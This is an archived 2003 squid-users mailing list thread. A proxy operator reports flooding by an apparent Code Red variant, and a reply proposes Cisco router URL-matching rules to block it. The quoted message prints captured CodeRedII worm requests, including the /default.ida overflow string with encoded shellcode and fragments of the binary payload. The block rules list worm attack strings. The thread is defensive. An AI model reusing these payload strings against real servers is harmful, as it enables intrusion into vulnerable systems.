Re: [squid-users] New Code Red?

From: MASOOD AHMAD <[email protected]>
Date: Thu, 3 Apr 2003 08:11:49 -0800 (PST)

I think for this u will have to deny it from your
border router like that

Router(config)#class-map match-any http-hacks
Router(config-cmap)#match protocol http url "*.ida*"
Router(config-cmap)#match protocol http url
"*cmd.exe*"
Router(config-cmap)#match protocol http url
"*root.exe*"

here yours

Router(config-cmap)#match protocol http url
"XXXXXXXXXXXXX"

I think it will work...

Best Regards,
Masood Ahmad Shah
System Administrator
Fibre Net
Lahore,Pakistan
Mobile# +92423004277367

--- Wei Keong <chooweikeong@pacific.net.sg> wrote:
> Hi,
>
> We are seeing a possible new code red. Each victim
> will flood to a
> particular destination. Unlike the original one,
> this one does not have
> send proper HTTP method. Although Squid will return
> Bad Request, this
> attack will consume a lot of resources and bring
> down the Squid box...
>
> Anybody catches the same thing? It seems to us that
> DENIED/403
> requires less processing than returning NONE/400 or
> NONE/411. If this it
> true, is there anyway to deny these requests?
>
>
> GET
>
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
>
>
8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
> f%u0078%u0000%u00=a HTTP/1.0..Content-type:
> text/xml.Conten
> t-length: 3379
> ........`........dg.6..dg.&.......h......\...
>
>
P.U...\...P.U..@.....X....U.=.......=..............T....u..~
>
>
0...........F0.........CodeRedII...$.U.f.....8.....P.......j
>
>
...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
>
>
.............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
>
>
\&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
>
>
s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
>
>
j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
>
>
...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
>
>
...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
>
>
.U..u..U..........w...........xu......`......d$.dg....Xa..dg
>
>
.6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r
>
...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
>
>
.Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
>
>
.u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
>
>
.GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
>
>
..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......GlobalAddAtomA
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
>
XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
>
>
1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host:
> xxx.xx.xxx.x
> x..Content-type: text/xml.Content-length: 3379
> ..Cache-Contr
> ol:
>
max-stale=0........`........dg.6..dg.&.......h......\...
>
>
P.U...\...P.U..@.....X....U.=.......=..............T....u..~
>
>
0...........F0.........CodeRedII...$.U.f.....8.....P.......j
>
>
...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
>
>
.............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
>
>
\&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
>
>
s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
>
>
j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
>
>
...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
>
>
...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
>
>
.U..u..U..........w...........xu......`......d$.dg....Xa..dg
>
>
.6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I
> .r
>
...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
>
>
.Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
>
>
.u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
>
>
.GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
>
>
..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E
> ......Global
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong
>
>
>

__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online, calculators, forms, and more
http://tax.yahoo.com
Received on Thu Apr 03 2003 - 09:12:29 MST

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:39 MST